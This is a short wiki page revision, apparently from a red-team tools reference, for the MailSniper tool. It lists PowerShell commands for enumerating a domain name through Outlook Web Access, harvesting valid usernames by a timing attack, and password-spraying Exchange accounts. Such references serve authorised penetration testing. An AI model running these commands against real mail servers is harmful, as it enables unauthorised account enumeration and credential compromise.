MailSniper: Difference between revisions

From RCATs
No edit summary
Line 1: Line 1:
[[Category:Tools]]
[[Category:Tools]]
==<ref>https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/</ref>Description==
==Description<ref>https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/</ref>==


==Commands<ref>https://github.com/dafthack/MailSniper</ref>==
==Commands<ref>https://github.com/dafthack/MailSniper</ref>==

Revision as of 12:28, 22 February 2023

Description[1]

Commands[2]

# Enumerate Netbios name
Invoke-DomainHarvestOWA -ExchHostname mail.name.com

# Uses timing attack to validate possible usernames with OWA server
Invoke-UsernameHarvestOWA -ExchHostname mail.name.io -Domain name.io -UserList possible.txt -OutFile valid.txt

# Password spray valid usernames with specific password
Invoke-PasswordSprayOWA -ExchHostname mail.name.io -UserList valid.txt -Password P@assword1234


References

  1. https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
  2. https://github.com/dafthack/MailSniper
Retrieved from "https://rcats.dev/rcats/index.php?title=MailSniper&oldid=748"